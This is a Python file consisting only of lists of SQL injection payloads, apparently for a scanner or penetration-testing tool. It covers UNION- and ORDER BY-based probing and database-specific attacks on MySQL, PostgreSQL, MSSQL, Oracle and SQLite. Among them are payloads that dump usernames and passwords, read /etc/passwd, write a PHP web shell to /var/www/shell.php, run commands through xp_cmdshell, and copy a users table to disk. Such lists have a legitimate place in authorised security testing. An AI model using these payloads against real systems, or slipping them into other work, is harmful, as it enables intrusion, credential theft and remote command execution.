UNION_PAYLOADS = [
    "' UNION SELECT NULL--",
    "' UNION SELECT NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL,NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",
    "' UNION ALL SELECT NULL--",
    "' UNION ALL SELECT NULL,NULL--",
    "' UNION ALL SELECT NULL,NULL,NULL--",
    "' UNION ALL SELECT NULL,NULL,NULL,NULL--",
    "' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL--",
    "' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL--",
    "' UNION SELECT 1--",
    "' UNION SELECT 1,2--",
    "' UNION SELECT 1,2,3--",
    "' UNION SELECT 1,2,3,4--",
    "' UNION SELECT 1,2,3,4,5--",
    "' UNION SELECT 1,2,3,4,5,6--",
    "' UNION ALL SELECT 1--",
    "' UNION ALL SELECT 1,2--",
    "' UNION ALL SELECT 1,2,3--",
    "' UNION ALL SELECT 1,2,3,4--",
    "' UNION ALL SELECT 1,2,3,4,5--",
    "' UNION ALL SELECT 1,2,3,4,5,6--",
    "' UNION SELECT 'a'--",
    "' UNION SELECT 'a','b'--",
    "' UNION SELECT 'a','b','c'--",
    "' UNION SELECT 'a','b','c','d'--",
    "' UNION ALL SELECT 'a'--",
    "' UNION ALL SELECT 'a','b'--",
    "' UNION ALL SELECT 'a','b','c'--",
    "' UNION ALL SELECT 'a','b','c','d'--",
    "') UNION SELECT NULL--",
    "') UNION SELECT NULL,NULL--",
    "') UNION SELECT NULL,NULL,NULL--",
    "') UNION SELECT NULL,NULL,NULL,NULL--",
    "') UNION SELECT 1--",
    "') UNION SELECT 1,2--",
    "') UNION SELECT 1,2,3--",
    "') UNION ALL SELECT NULL--",
    "') UNION ALL SELECT NULL,NULL--",
    "') UNION ALL SELECT 1--",
    "') UNION ALL SELECT 1,2--",
]

UNION_PAYLOADS_MYSQL = [
    "' UNION SELECT @@VERSION--",
    "' UNION SELECT USER(),DATABASE(),VERSION()--",
    "' UNION SELECT table_name FROM information_schema.tables--",
    "' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--",
    "' UNION SELECT username,password FROM users--",
    "' UNION SELECT NULL FROM mysql.user WHERE 1=1--",
    "' UNION SELECT LOAD_FILE('/etc/passwd')--",
    "' UNION SELECT '<?php system($_GET[\"cmd\"]); ?>' INTO OUTFILE '/var/www/shell.php'--",
    "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10 INTO @,@,@,@,@,@,@,@,@,@--",
]

UNION_PAYLOADS_POSTGRESQL = [
    "' UNION SELECT version()--",
    "' UNION SELECT current_user,current_database()--",
    "' UNION SELECT tablename FROM pg_tables--",
    "' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--",
    "' UNION SELECT username,password FROM pg_user--",
    "' UNION SELECT NULL FROM pg_user WHERE 1=1--",
    "1'; COPY (SELECT * FROM users) TO '/tmp/users.txt'--",
]

UNION_PAYLOADS_MSSQL = [
    "' UNION SELECT @@VERSION--",
    "' UNION SELECT USER_NAME(),DB_NAME(),@@VERSION--",
    "' UNION SELECT name FROM sysobjects WHERE xtype='U'--",
    "' UNION SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='users')--",
    "' UNION SELECT username,password FROM users--",
    "' UNION SELECT NULL FROM sysusers WHERE 1=1--",
    "1'; SELECT * INTO #temp FROM users--",
    "1'; EXEC xp_cmdshell 'whoami'--",
]

UNION_PAYLOADS_ORACLE = [
    "' UNION SELECT NULL FROM DUAL--",
    "' UNION SELECT banner FROM v$version WHERE ROWNUM=1--",
    "' UNION SELECT table_name FROM user_tables--",
    "' UNION SELECT column_name FROM user_tab_columns WHERE table_name='USERS'--",
    "' UNION SELECT USERNAME,PASSWORD FROM USERS--",
    "' UNION SELECT 1,2,3,4,5 FROM DUAL--",
]

UNION_PAYLOADS_SQLITE = [
    "' UNION SELECT sqlite_version()--",
    "' UNION SELECT name FROM sqlite_master WHERE type='table'--",
    "' UNION SELECT sql FROM sqlite_master WHERE type='table' AND name='users'--",
    "' UNION SELECT name,sql FROM sqlite_master WHERE type='table'--",
    "' UNION SELECT * FROM users--",
]

ORDER_BY_PAYLOADS = [
    "1' ORDER BY 1--",
    "1' ORDER BY 2--",
    "1' ORDER BY 3--",
    "1' ORDER BY 4--",
    "1' ORDER BY 5--",
    "1' ORDER BY 6--",
    "1' ORDER BY 7--",
    "1' ORDER BY 8--",
    "1' ORDER BY 9--",
    "1' ORDER BY 10--",
    "1' ORDER BY 1,2--",
    "1' ORDER BY 1,2,3--",
    "1' ORDER BY 1,2,3,4--",
    "1' ORDER BY 1,2,3,4,5--",
    "1' ORDER BY 1,2,3,4,5,6--",
    "1' ORDER BY 1,2,3,4,5,6,7--",
    "1' ORDER BY 1,2,3,4,5,6,7,8--",
    "1' ORDER BY 1,2,3,4,5,6,7,8,9--",
    "1' ORDER BY 1,2,3,4,5,6,7,8,9,10--",
]
